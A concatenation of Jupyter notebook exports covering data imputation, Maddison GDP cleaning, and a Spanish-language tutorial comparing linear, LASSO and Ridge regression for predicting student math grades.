grt_txt("../data/additional-features-v2/new/attack_Text/social_engineering.txt", '124M','../data/additional-features-v2/new/Generated_text/Social_engineering/')
grt_txt("../data/additional-features-v2/new/attack_Text/malware.txt", '124M','../data/additional-features-v2/new/Generated_text/Malware/')
grt_txt("../data/additional-features-v2/new/attack_Text/Credential_phishing.txt", '124M','../data/additional-features-v2/new/Generated_text/Credential_phishing/')
###Output
_____no_output_____
###Markdown
Impute The Full Dataset
###Code
import numpy as np
from fancyimpute import IterativeImputer
import pandas as pd
df = pd.read_pickle("../data/production/clean_dataset.pickle")
model = df['USDA Model']
df.drop('USDA Model', axis='columns', inplace=True)
XY_incomplete = df.values
XY_completed = []
for i in [435789,36,345668,43432546,327256]:
imputer = IterativeImputer(n_iter=5, sample_posterior=True, random_state=i)
XY_completed.append(imputer.fit_transform(XY_incomplete))
XY_completed_mean = np.mean(XY_completed, 0)
XY_completed_std = np.std(XY_completed, 0)
df.loc[:] = XY_completed_mean
df['USDA Model'] = model
df.to_pickle("../data/production/imputed_dataset.pickle")
df.to_csv("../data/production/imputed_dataset.csv")
###Output
_____no_output_____
###Markdown
Economic Data Processing (MADDISON)
>Maddison Project Database, version 2018. Bolt, Jutta, Robert Inklaar, Herman de Jong and Jan Luiten van Zanden (2018), “Rebasing ‘Maddison’: new income comparisons and the shape of long-run economic development”, Maddison Project Working paper 10

Data Dictionary

| Full data | Data in single table |
|-------------------|----------------------|
| countrycode | 3-letter ISO country code |
| country | Country name |
| year | Year |
| cgdppc | Real GDP per capita in 2011US\$, multiple benchmarks (suitable for cross-country income comparisons) |
| rgdpnapc | Real GDP per capita in 2011US\$, 2011 benchmark (suitable for cross-country growth comparisons) |
| pop | Population, mid-year (thousands) |
| i_cig | 0/1/2: observation is extrapolated (0), benchmark (1), or interpolated (2) |
| i_bm | For benchmark observations: 1: ICP PPP estimates, 2: Historical income benchmarks, 3: Real wages and urbanization, 4: Multiple of subsistence, 5: Braithwaite (1968) PPPs |
| Partial countries | Data for selected sub-national units with long time series |
###Code
import pandas as pd
import pycountry
%matplotlib inline
pd.set_option('display.float_format', lambda x: '%.3f' % x)
###Output
_____no_output_____
###Markdown
Load The File
###Code
df = pd.read_excel("../data/external/Economy/MADDISON/mpd2018.xlsx",
sheet_name='Full data')
df.sample(5)
###Output
_____no_output_____
###Markdown
Standardize Country Codes
###Code
""" Only Select rows with valid country codes
"""
country_locations = []
for country in df['countrycode']:
try:
pycountry.countries.lookup(country)
country_locations.append(True)
except LookupError:
country_locations.append(False)
df = df[country_locations]
###Output
_____no_output_____
###Markdown
Standardize Indexes Years (1995 ≤ x ≤ 2017)
###Code
df = df[df['year'] >= 1995]
df = df[df['year'] <= 2017]
###Output
_____no_output_____
###Markdown
Reindex & Rename
###Code
df.rename(
{
"year": "Year",
"countrycode": "Country Code",
"cgdppc": "Maddison GDPPC"
},
axis='columns',
inplace=True)
df.set_index(["Country Code", "Year"], inplace=True)
###Output
_____no_output_____
###Markdown
Clean Data Remove unneeded variables
###Code
df.drop(["country", "i_cig", "i_bm", "rgdpnapc", "pop"],
axis='columns',
inplace=True)
###Output
_____no_output_____
###Markdown
Data Types
###Code
df.dtypes
###Output
_____no_output_____
###Markdown
Save Data
###Code
df.to_pickle("../data/processed/Economic_MADDISON.pickle")
###Output
_____no_output_____ |
M2/2_3 y 2_4 MultipleLinearRegression-LASSO-Ridge.ipynb | ###Markdown
Multiple Linear Regression and LASSO Students grades [Source Information](https://www.kaggle.com/hely333/what-is-the-secret-of-academic-success/data) P. Cortez and A. Silva. Using Data Mining to Predict Secondary School Student Performance. In A. Brito and J. Teixeira Eds., Proceedings of 5th FUture BUsiness TEChnology Conference (FUBUTEC 2008) pp. 5-12, Porto, Portugal, April, 2008, EUROSIS, ISBN 978-9077381-39-7.
###Code
# Se cargan las librerías que se van a utilizar
import numpy as np
import math
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import sklearn
from scipy.optimize import minimize
from sklearn.model_selection import train_test_split
from sklearn.linear_model import Lasso, LassoCV
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge, RidgeCV
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import scale
pd.set_option('display.max_columns', 33) # by default is 10, if change to None print ALL
## 1) EXTRAER DATOS
df = pd.read_csv('student_mat.csv')
print(df.shape)
## 2) ANÁLISIS EXPLORATORIO
df.head()
###Output
_____no_output_____
###Markdown
The data correspond to 395 students, aged 15 to 22, enrolled in a Mathematics course. The information available for each student is (33 columns): - **school :** _GP:_ Gabriel Pereira, _MS:_ Mousinho da Silveira - **sex:** _F:_ female, _M:_ male - **age:** student's age (15-22) - **address:** _U:_ urban, _R:_ rural - **famsize:** 'LE3' - less or equal to 3 or 'GT3' - greater than 3 - **Pstatus:** 'T' - living together or 'A' - apart - **Medu:** mother's education (numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education) - **Fedu:** father's education (numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education) - **Mjob:** mother's job (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other') - **Fjob:** father's job (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other') - **reason:** reason to choose this school (nominal: close to 'home', school 'reputation', 'course' preference or 'other') - **guardian:** student's guardian (nominal: 'mother', 'father' or 'other') - **traveltime:** home to school travel time (numeric: 1 - 4 hours) - **studytime:** weekly study time (numeric: 1 - 10 hours) - **failures:** number of past class failures (numeric: n if 1<=n<3, else 4) - **schoolsup:** extra educational support (binary: yes or no) - **famsup:** family educational support (binary: yes or no) - **paid:** extra paid classes within the course subject (Math) (binary: yes or no) - **activities:** extra-curricular activities (binary: yes or no) - **nursery:** attended nursery school (binary: yes or no) - **higher:** wants to take higher education (binary: yes or no) - **internet:** Internet access at home (binary: yes or no) - **romantic:** with a romantic relationship (binary: yes or no) - **famrel:** quality of family relationships (numeric: from 1 - very bad to 5 - excellent) - **freetime:** free time after school (numeric: from 1 - very low to 5 - very high) - **goout:** going out with friends (numeric: from 1 - very low to 5 - very high) - **Dalc:** workday alcohol consumption (numeric: from 1 - very low to 5 - very high) - **Walc:** weekend alcohol consumption (numeric: from 1 - very low to 5 - very high) - **health:** current health status (numeric: from 1 - very bad to 5 - very good) - **absences:** number of school absences (numeric: from 0 to 93) - **G1:** first period grade (numeric: from 0 to 20) - **G2:** second period grade (numeric: from 0 to 20) - **G3:** final grade (numeric: from 0 to 20, output target) The goal is to estimate the final grade: _G3_.
###Code
# Se cuenta el número de NaN's por columna
df.isnull().sum()
# Se definen las varibles X (predictoras) y Y (dependiente)
Y = df.G3
X = df.drop(['G3'], axis = 1)
X.head()
# Matriz de correlación
corr = df.corr()
#corr
ax = sns.heatmap(
corr,
vmin=-1, vmax=1, center=0,
cmap=sns.diverging_palette(20, 220, n=200),
square=True
)
###Output
_____no_output_____
###Markdown
Before converting the categorical variables into dummy variables, let's look at a few plots to decide which ones to use in the regression.
###Code
## 3) VISUALIZACIÓN DE LOS DATOS
#Histograma de la frecuencia relativa del salario con la densidad ajustada correspondiente.
sns.distplot(Y)
plt.title('Histograma de la frecuencia relativa de las calificaciones')
plt.xlabel('Calificaciones')
plt.ylabel('Frecuencia relativa')
print(df['sex'].value_counts())
sns.countplot(x='sex', data=df)
plt.show()
print(df['age'].value_counts())
sns.countplot(x='age', data=df)
plt.show()
print(df['address'].value_counts())
sns.countplot(x='address', data=df)
plt.show()
sns.countplot(x='age', hue='Pstatus', data=df)
plt.title('Estudiantes viviendo con o sin sus padres por edad')
plt.xlabel('A = No viven con sus padres, T = Si viven con sus padres')
plt.ylabel('Número de estudiantes')
plt.show()
# numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education
print(df['Medu'].value_counts())
sns.countplot(x='Medu', data=df)
plt.show()
# numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education
print(df['Fedu'].value_counts())
sns.countplot(x='Fedu', data=df)
plt.show()
# (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other')
print(df['Mjob'].value_counts())
sns.countplot(x='Mjob', data=df)
plt.show()
# (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other')
print(df['Fjob'].value_counts())
sns.countplot(x='Fjob', data=df)
plt.show()
# numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education
sns.countplot(x='Mjob', hue='Medu', data=df)
plt.title('Trabajo y educación de las mamás de los estudiantes')
plt.xlabel('Trabajo')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='Fjob', hue='Fedu', data=df)
plt.title('Trabajo y educación de los papás de los estudiantes')
plt.xlabel('Trabajo')
plt.ylabel('Número de estudiantes')
plt.show()
# reason to choose this school (nominal: close to 'home', school 'reputation', 'course' preference or 'other')
print(df['reason'].value_counts())
sns.countplot(x='reason', data=df)
plt.show()
print(df['guardian'].value_counts())
sns.countplot(x='guardian', data=df)
plt.show()
sns.countplot(x='guardian', hue='age', data=df)
plt.title('Guardianes de los estudiantes')
plt.xlabel('Guardián')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='traveltime', hue='address', data=df)
plt.title('Horas de camino por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='studytime', hue='address', data=df)
plt.title('Horas de estudio por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
print(df['failures'].value_counts())
sns.countplot(x='failures', data=df)
plt.show()
sns.countplot(x='age', hue='failures', data=df)
plt.title('Número de clases reprobadas por edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
print(df['schoolsup'].value_counts())
sns.countplot(x='schoolsup', data=df)
plt.show()
print(df['famsup'].value_counts())
sns.countplot(x='famsup', data=df)
plt.show()
print(df['paid'].value_counts())
sns.countplot(x='paid', data=df)
plt.show()
print(df['activities'].value_counts())
sns.countplot(x='activities', data=df)
plt.show()
sns.countplot(x='address', hue='activities', data=df)
plt.title('Actividades por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
print(df['nursery'].value_counts())
sns.countplot(x='nursery', data=df)
plt.show()
print(df['higher'].value_counts())
sns.countplot(x='higher', data=df)
plt.show()
sns.countplot(x='address', hue='internet', data=df)
plt.title('Internet por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='age', hue='romantic', data=df)
plt.title('Estudiantes con o sin relación amorosa por edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='age', hue='famrel', data=df)
plt.title('Calidad de la relación familiar por edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='address', hue='freetime', data=df)
plt.title('Tiempo libre por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
#going out with friends (numeric: from 1 - very low to 5 - very high)
#free time after school (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='goout', hue='freetime', data=df)
plt.title('Salir con amigos por Tiempo libre')
plt.xlabel('Salir con amigos')
plt.ylabel('Número de estudiantes')
plt.show()
#going out with friends (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='age', hue='goout', data=df)
plt.title('Salir con amigos por Edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
#workday alcohol consumption (numeric: from 1 - very low to 5 - very high)
print(df['Dalc'].value_counts())
sns.countplot(x='Dalc', data=df)
plt.show()
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
print(df['Walc'].value_counts())
sns.countplot(x='Walc', data=df)
plt.show()
#workday alcohol consumption (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='age', hue='Dalc', data=df)
plt.title('Consumo de alcohol entre semana por Edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='age', hue='Walc', data=df)
plt.title('Consumo de alcohol en fin de semana por Edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
#current health status (numeric: from 1 - very bad to 5 - very good)
print(df['health'].value_counts())
sns.countplot(x='health', data=df)
plt.show()
sns.boxplot(x="absences", data=df)
plt.figure(figsize=(12,8))
sns.boxplot(orient="h",data=df[['G1','G2']])
plt.title('Gráficas de caja de calificaciones')
plt.xlabel('Calificaciones')
plt.figure(figsize=(12,8))
plt.title("Calificaciones del primer parcial de acuerdo a las horas de estudio")
sns.boxplot(y="studytime", x="G1", data = df , orient="h")
plt.figure(figsize=(12,8))
plt.title("Calificaciones del segundo parcial de acuerdo a las horas de estudio")
sns.boxplot(y="studytime", x="G2", data = df , orient="h")
plt.figure(figsize=(12,8))
plt.title("Calificaciones finales de acuerdo a las personas que quieren o no seguir estudiando")
sns.boxplot(y="higher", x="G3", data = df , orient="h")
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
#going out with friends (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='goout', hue='Dalc', data=df)
plt.title('Consumo de alcohol entre semana por salidas con amigos')
plt.xlabel('Salir con amigos')
plt.ylabel('Número de estudiantes')
plt.show()
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='goout', hue='Walc', data=df)
plt.title('Consumo de alcohol en fin de semana por salidas con amigos')
plt.xlabel('Salir con amigos')
plt.ylabel('Número de estudiantes')
plt.show()
# Se eliminan las columnas algunas columnas:
print('Antes se tenían ',X.shape[1],' columnas.')
X = X.drop(['school','sex','famsize','Medu','Fedu','Mjob','Fjob','reason','guardian','nursery','higher','famrel'], axis = 1)
print('Ahora se tienen ',X.shape[1],' columnas.')
X.head()
X.describe()
#Se definen las variables dummies para las variables categóricas
dummies = pd.get_dummies(X[['address', 'Pstatus', 'schoolsup','famsup','paid','activities','internet','romantic']])
dummies.head()
#Se reemplazan por las variables dummies
X = X.drop(['address', 'Pstatus', 'schoolsup','famsup','paid','activities','internet','romantic'], axis = 1).astype('float64')
X = pd.concat([X, dummies[['address_U', 'Pstatus_T', 'schoolsup_yes','famsup_yes','paid_yes','activities_yes',
'internet_yes','romantic_yes']]], axis = 1)
print(X.shape[0],' renglones\n',X.shape[1],' columnas')
X.head()
#Se define un nuevo datafram para mostrar la correlación entre las variables
datos = pd.concat([X,Y], axis = 1)
datos.head()
#sns.pairplot(datos)
#Se muestra la correlación entre la calificación y las variables predictivas
for i in [0,4,8,12]:
sns.pairplot(data=datos,
y_vars=['G3'],
x_vars=['G3',X.columns[i], X.columns[i+1], X.columns[i+2],X.columns[i+3]])
plt.show()
#No se muestran las gráficas de las columnas con variables dummies
## 4) DIVIDIR LOS DATOS
X_train, X_test, Y_train, Y_test = train_test_split(X, Y,test_size = 0.2,random_state = 1)
###Output
_____no_output_____
###Markdown
Multiple Linear Regression
###Code
## 5) CONSTRUIR UN MODELO
# En este ejemplo vamos a elegir un modelo de regresión lineal simple para "X_train"
regresor = LinearRegression()
regresor.fit(X_train, Y_train)
## 6) PREDICCIONES
# Se hacen las predicciones con "X_test"
Y_pred_lin = regresor.predict(X_test)
# Se grafican los resultados de la predicción.
plt.scatter(Y_test, Y_pred_lin, color = 'blue')
plt.title('Predicciones')
plt.xlabel('Calificaciones reales')
plt.ylabel('Calificaciones estimadas')
plt.show()
#Se imprimen los valores de los coeficientes
print(pd.Series(regresor.coef_, index = X.columns)) # Valor de los coeficientes
# Se grafican los valores de los coeficientes (betas).
eje_X = range(1,len(regresor.coef_)+1,1)
plt.scatter(eje_X, regresor.coef_, color = 'purple')
plt.title('Betas')
plt.xlabel('Índices')
plt.ylabel('Valor de coeficientes')
plt.show()
###Output
_____no_output_____
###Markdown
7) MODEL EVALUATION Let's see how the model behaves: 7.1 Compute the adjusted $R^{2} = 1 - \dfrac{(1 - R^{2}) (n-1)}{n - p - 1}$, where $R^{2}:$ R-squared of the data, $n:$ number of training observations, $p:$ number of independent variables. 7.2 Compute the absolute errors $(actual - predicted)$ and plot them. 7.3 Compute the relative errors $\left( \dfrac{\text{actual - predicted}}{\text{actual}} \right)$ and plot them. 7.4 Plot predicted vs. actual values. 7.5 Compute the squared errors: $(actual − predicted)^{2}$. 7.6 Compute the mean squared error: $\dfrac{\displaystyle \sum_{i = 1}^{n} (actual_{i} − predicted_{i})^{2}}{n}$
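Since the same metrics are recomputed for each model below, steps 7.1 and 7.6 can be wrapped in a small helper. This is only a sketch; the function name `adjusted_r2` is introduced here for illustration and is not used elsewhere in the notebook.
```python
from sklearn.metrics import r2_score, mean_squared_error

def adjusted_r2(y_true, y_pred, n, p):
    """Adjusted R^2 = 1 - (1 - R^2)(n - 1) / (n - p - 1)."""
    r2 = r2_score(y_true, y_pred)
    return 1 - ((1 - r2) * (n - 1)) / (n - p - 1)

# Example usage, mirroring the cells below:
# adjusted_r2(Y_test, Y_pred_lin, n=len(Y_train), p=X_train.shape[1])
```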
###Code
#7.1 Calcular R^2 ajustada
r_cuad_lin = r2_score(Y_test,Y_pred_lin)
print('R^2 = ',round(r_cuad_lin,3))
#R^2 ajustada
n = len(Y_train)
p = X_train.shape[1]
r_cuad_aj_lin = 1 - (((1-r_cuad_lin)*(n-1))/(n-p-1))
print('n = ',n)
print('p = ',p)
print('R^2_aj = ',round(r_cuad_aj_lin,3))
#7.2 Calcular los errores absolutos (real - estimado) y graficarlos
err_abs = Y_test-Y_pred_lin
plt.scatter(Y_test, err_abs, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores absolutos (real - estimado)')
plt.xlabel('Calificación real')
plt.ylabel('Errores absolutos')
plt.show()
#7.3 Calcular los errores relativos [(real - estimado)/real] y graficarlos
err_rel = err_abs/Y_test
plt.scatter(Y_test, err_rel, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores relativos [(real - estimado)/real]')
plt.xlabel('Calificación real')
plt.ylabel('Errores relativos')
plt.show()
#7.4 Graficar valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_lin), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
#7.5 Calcular el error cuadrático = (real − estimado)^2
#print(np.around(err_abs,2))
err_cuad = pow(err_abs,2)
#7.6 Calcular el error cuadrático medio = (1/n) * \sum (real − estimado)^2
ECM_lin = mean_squared_error(Y_test, Y_pred_lin)
print(round(ECM_lin,2))
#Graficamos los errores cuadráticos
Y_ECM= np.repeat(ECM_lin, len(err_cuad))
plt.scatter(Y_test, err_cuad, color = 'blue')
plt.plot(Y_test,Y_ECM , color = 'lime') #Recta en Y = err_cuad_medio
plt.title('Errores cuadráticos: (real − estimado)^2')
plt.xlabel('Calificación real')
plt.ylabel('Errores cuadráticos')
plt.show()
###Output
3.16
###Markdown
LASSO
###Code
# Define the grid of lambda values; note that the name 'lambda' is reserved in Python for anonymous functions, so the vector is called 'lambdas'
lambdas = 10**np.linspace(10,-2,100)*0.5
#To standardize the variables, the "normalize" parameter is set to True.
#The maximum number of iterations is set to 10,000
lasso = Lasso(max_iter = 10000, normalize = True)
coefs = []
for k in lambdas:
lasso.set_params(alpha = k)
lasso.fit(scale(X_train), Y_train)
coefs.append(lasso.coef_)
np.shape(coefs) # Matrix of coefficients: one row per lambda value, one column per independent variable
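# Optional illustration (a sketch): the coefficient matrix computed above can be used to
# plot the LASSO regularization path, i.e. how each coefficient shrinks toward zero as lambda grows.
ax = plt.gca()
ax.plot(lambdas, coefs)
ax.set_xscale('log')
plt.xlabel('lambda (log scale)')
plt.ylabel('Coefficient value')
plt.title('LASSO coefficients vs. regularization strength')
plt.show()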
## 5) CONSTRUIR UN MODELO
# Vamos a elegir lambda con "cross validation"
lassocv = LassoCV(alphas = None, cv = 10, max_iter = 100000, normalize = True)
lassocv.fit(X_train, Y_train)
#Se imprimen los valores de los coeficientes
print(pd.Series(lassocv.coef_, index = X.columns)) # Valor de los coeficientes
# Se grafican los valores de los coeficientes (betas).
eje_X = range(1,len(lassocv.coef_)+1,1)
plt.scatter(eje_X, lassocv.coef_, color = 'purple')
plt.title('Betas')
plt.xlabel('Índices')
plt.ylabel('Valor de coeficientes')
plt.show()
###Output
_____no_output_____
###Markdown
Interpretation of the coefficients
###Code
## 6) PREDICCIONES
# Se hacen las predicciones con "X_test"
lasso.set_params(alpha=lassocv.alpha_)
print('El valor de lambda encontrado con "cross validation" es: ',round(lassocv.alpha_,3))
lasso.fit(X_train, Y_train)
Y_pred_lasso = lasso.predict(X_test)
# Se grafican los resultados de la predicción.
plt.scatter(Y_test, Y_pred_lasso, color = 'blue')
plt.title('Predicciones')
plt.xlabel('Calificaciones reales')
plt.ylabel('Calificaciones estimadas')
plt.show()
###Output
El valor de lambda encontrado con "cross validation" es: 0.006
###Markdown
7) MODEL EVALUATION Let's see how the model behaves: 7.1 Compute the adjusted $R^{2} = 1 - \dfrac{(1 - R^{2}) (n-1)}{n - p - 1}$, where $R^{2}:$ R-squared of the data, $n:$ number of training observations, $p:$ number of independent variables. 7.2 Compute the absolute errors $(actual - predicted)$ and plot them. 7.3 Compute the relative errors $\left( \dfrac{\text{actual - predicted}}{\text{actual}} \right)$ and plot them. 7.4 Plot predicted vs. actual values. 7.5 Compute the squared errors: $(actual − predicted)^{2}$. 7.6 Compute the mean squared error: $\dfrac{\displaystyle \sum_{i = 1}^{n} (actual_{i} − predicted_{i})^{2}}{n}$
###Code
#7.1 Calcular R^2 ajustada
r_cuad_lasso = r2_score(Y_test,Y_pred_lasso)
print('R^2 = ',round(r_cuad_lasso,3))
#R^2 ajustada
n = len(Y_train)
p = X_train.shape[1]
r_cuad_aj_lasso = 1 - (((1-r_cuad_lasso)*(n-1))/(n-p-1))
print('n = ',n)
print('p = ',p)
print('R^2_aj = ',round(r_cuad_aj_lasso,3))
#7.2 Calcular los errores absolutos (real - estimado) y graficarlos
err_abs = Y_test-Y_pred_lasso
plt.scatter(Y_test, err_abs, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores absolutos (real - estimado)')
plt.xlabel('Calificación real')
plt.ylabel('Errores absolutos')
plt.show()
#7.3 Calcular los errores relativos [(real - estimado)/real] y graficarlos
err_rel = err_abs/Y_test
plt.scatter(Y_test, err_rel, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores relativos [(real - estimado)/real]')
plt.xlabel('Calificación real')
plt.ylabel('Errores relativos')
plt.show()
#7.4 Graficar valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_lasso), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
#7.4 Graficar valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_lasso), color = 'red') #Recta de valores estimados con LASSO
plt.plot(eje_X, sorted(Y_pred_lin), color = 'blue') #Recta de valores estimados con regresión lineal múltiple
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#7.5 Calcular el error cuadrático = (real − estimado)^2
#print(np.around(err_abs,2))
err_cuad = pow(err_abs,2)
#7.6 Calcular el error cuadrático medio = (1/n) * \sum (real − estimado)^2
ECM_lasso = mean_squared_error(Y_test, Y_pred_lasso)
print(round(ECM_lasso,2))
#Graficamos los errores cuadráticos
Y_ECM= np.repeat(ECM_lasso, len(err_cuad))
plt.scatter(Y_test, err_cuad, color = 'blue')
plt.plot(Y_test,Y_ECM , color = 'lime') #Recta en Y = err_cuad_medio
plt.title('Errores cuadráticos: (real − estimado)^2')
plt.xlabel('Calificación real')
plt.ylabel('Errores cuadráticos')
plt.show()
###Output
2.97
###Markdown
Conclusions
###Code
print("Regresión Lineal Múltiple:")
print("R^2 ajustada = ",round(r_cuad_aj_lin,3)," ECM = ",round(ECM_lin,3))
print("\nLASSO:")
print("R^2 ajustada = ",round(r_cuad_aj_lasso,3)," ECM = ",round(ECM_lasso,3))
###Output
Regresión Lineal Múltiple:
R^2 ajustada = 0.753 ECM = 3.158
LASSO:
R^2 ajustada = 0.768 ECM = 2.967
###Markdown
Comparing both models by mean squared error and adjusted $R^{2}$, _LASSO Regression_ is chosen. The variables whose coefficients were shrunk to zero by LASSO are: - traveltime - studytime - Dalc - Walc - address_U - Pstatus_T - schoolsup_yes - famsup_yes - paid_yes - internet_yes What can be said about these results? What other variables could be added to the model? - school - sex - famsize - Medu - Fedu - Mjob - Fjob - reason - guardian - nursery - higher - famrel
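To double-check which coefficients the cross-validated LASSO actually shrank to zero, a small follow-up can be run (a sketch, assuming the `lassocv` object fitted above is still in scope):
```python
# List the predictors whose LASSO coefficients are exactly zero
coefs_lasso = pd.Series(lassocv.coef_, index = X.columns)
print(coefs_lasso[coefs_lasso == 0].index.tolist())
```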
###Code
# Se define un nuevo dataframe:
X2 = df[['school','sex','famsize','Medu','Fedu','Mjob','Fjob','reason','guardian','nursery',
'age','romantic','higher','famrel','G1','G2']]
print(X2.shape)
X2.head()
#Se definen las variables dummies para las variables categóricas
dummies = pd.get_dummies(X2[['school', 'sex','famsize','Mjob','Fjob','reason','guardian','nursery','romantic','higher']])
dummies.head()
#Se reemplazan por las variables dummies
X2 = X2.drop(['school', 'sex','famsize','Mjob','Fjob','reason','guardian','nursery','romantic',
'higher'], axis = 1).astype('float64')
X2 = pd.concat([X2, dummies[['school_GP','sex_F','famsize_GT3',
'Mjob_at_home','Mjob_health','Mjob_services','Mjob_teacher',
'Fjob_at_home','Fjob_health','Fjob_services','Fjob_teacher',
'reason_course','reason_home','reason_reputation',
'guardian_father','guardian_mother','nursery_yes','romantic_yes','higher_yes']]], axis = 1)
X2.head()
#Se muestra la correlación entre la calificación y las variables predictivas
for i in [0,3]:
sns.pairplot(data=df,
y_vars=['G3'],
x_vars=['G3',X2.columns[i], X2.columns[i+1], X2.columns[i+2]])
plt.show()
#No se muestran las gráficas de las columnas con variables dummies
## 4) DIVIDIR LOS DATOS
# Note: this split uses random_state = 0 and the X2 feature set, so the resulting
# X_test/Y_test no longer match the test split used for the linear and LASSO models above
X_train, X_test, Y_train, Y_test = train_test_split(X2, Y,test_size = 0.2,random_state = 0)
###Output
_____no_output_____
###Markdown
Ridge Regression
###Code
## 5) CONSTRUIR UN MODELO
#Le pasamos como parámetro el vector con los diferentes valores de lambda para que
#se elija la mejor con "cross validation"
ridgecv = RidgeCV(alphas = lambdas, scoring = 'neg_mean_squared_error', normalize = True)
ridgecv.fit(X_train, Y_train)
print('El valor de lambda encontrado con "cross validation" es: ',round(ridgecv.alpha_,3))
#Verificamos que el valor encontrado está en el vector de lambdas
ridgecv.alpha_ in lambdas
#Se imprimen los valores de los coeficientes
mod_ridgeCV = Ridge(alpha = ridgecv.alpha_, normalize = True)
mod_ridgeCV.fit(X_train, Y_train)
print(pd.Series(mod_ridgeCV.coef_, index = X2.columns)) # Valor de los coeficientes
# Se grafican los valores de los coeficientes (betas).
eje_X = range(1,len(mod_ridgeCV.coef_)+1,1)
plt.scatter(eje_X, mod_ridgeCV.coef_, color = 'purple')
plt.title('Betas')
plt.xlabel('Índices')
plt.ylabel('Valor de coeficientes')
plt.show()
###Output
_____no_output_____
###Markdown
Interpretation of the coefficients
###Code
## 6) PREDICCIONES
Y_pred_ridge = mod_ridgeCV.predict(X_test)
# Se grafican los resultados de la predicción.
plt.scatter(Y_test, Y_pred_ridge, color = 'blue')
plt.title('Predicciones')
plt.xlabel('Calificaciones reales')
plt.ylabel('Calificaciones estimadas')
plt.show()
## 7) EVALUACIÓN DEL MODELO
#7.1 Calcular R^2 ajustada
r_cuad_ridge = r2_score(Y_test,Y_pred_ridge)
print('R^2 = ',round(r_cuad_ridge,3)) #Porcentaje de los datos explicados por el modelo
#R^2 ajustada
n = len(Y_train)
p = X_train.shape[1]
r_cuad_aj_ridge = 1 - (((1-r_cuad_ridge)*(n-1))/(n-p-1))
print('n = ',n)
print('p = ',p)
print('R^2_aj = ',round(r_cuad_aj_ridge,3))
#Calculamos el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
ECM_ridge = round(mean_squared_error(Y_test, Y_pred_ridge),3)
print(ECM_ridge)
print("Regresión Lineal Múltiple:")
print("R^2 ajustada = ",round(r_cuad_aj_lin,3)," ECM = ",round(ECM_lin,3))
print("\nLASSO:")
print("R^2 ajustada = ",round(r_cuad_aj_lasso,3)," ECM = ",round(ECM_lasso,3))
print("\nRidge:")
print("R^2 ajustada = ",round(r_cuad_aj_ridge,3)," ECM = ",round(ECM_ridge,3))
###Output
